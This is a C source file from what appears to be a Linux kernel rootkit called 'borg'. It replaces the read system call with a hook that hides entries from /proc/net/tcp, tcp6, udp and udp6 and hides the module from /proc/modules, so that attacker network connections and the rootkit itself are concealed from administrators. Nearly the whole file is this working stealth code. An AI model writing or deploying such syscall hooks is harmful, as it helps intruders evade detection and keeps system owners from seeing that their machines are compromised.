/**
 * @file read.c
 * @brief Hides entries from /proc/net/tcp(6) and /proc/net/udp(6).
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/types.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#include <linux/sched.h>
#include <linux/file.h>
#include <linux/fdtable.h>
#include "borg.h"
#include "net.h"
#include "proc.h"

asmlinkage int (*original_read)(int, void *, size_t);

asmlinkage int borg_read(int fd, void *buf, size_t count)
{
    struct file * file = current->files->fdt->fd[fd];
    int ret, proc_net = 0, proc_modules = 0;

    _DEBUG(("%s: borg_read(): reading fd %d [%d:%d]\n", BORG_VERSION, fd,
	file->f_uid, file->f_gid));

    if(!file->f_dentry)
    {
	_DEBUG(("%s: borg_read(): file->f_dentry == NULL\n", BORG_VERSION));
    }
    if(!file->f_dentry->d_iname)
    {
	_DEBUG(("%s: borg_read(): file->f_dentry->d_iname == NULL\n",
	    BORG_VERSION));
    } else
	_DEBUG(("%s: borg_read(): file->f_dentry->d_iname == %s\n",
	    BORG_VERSION, file->f_dentry->d_iname));

    /* Check if we are reading any of /proc/net/{tcp,tcp6,udp,udp6} */
    if(((strcmp(file->f_dentry->d_iname, "tcp")  == 0) ||
	(strcmp(file->f_dentry->d_iname, "tcp6") == 0) ||
	(strcmp(file->f_dentry->d_iname, "udp")  == 0) ||
	(strcmp(file->f_dentry->d_iname, "udp6") == 0)
       ) && (
        (file->f_dentry->d_parent) &&
	(strcmp(file->f_dentry->d_parent->d_iname, "net") == 0)
       ) && (
        (file->f_dentry->d_parent->d_parent) &&
	(file->f_dentry->d_parent->d_parent->d_inode->i_ino == PROC_ROOT_INO)
       )
      )
    {
	_DEBUG(("%s: borg_read(): reading in /proc/net: %s (hiding network sockets)\n",
	    BORG_VERSION, file->f_dentry->d_iname));
	proc_net = 1;
    }
    /* Check if we are reading /proc/modules. */
    if(((strcmp(file->f_dentry->d_iname, "modules")) == 0) &&
       (file->f_dentry->d_parent) &&
       (file->f_dentry->d_parent->d_inode->i_ino == PROC_ROOT_INO)
      )
    {
	proc_modules = 1;
    }
    
    if(proc_net) net_hide();
    if(proc_modules) proc_hide();
    
    ret = original_read(fd, buf, count);
    
    if(proc_modules) proc_unhide();
    if(proc_net) net_unhide();
    
    return ret;
}
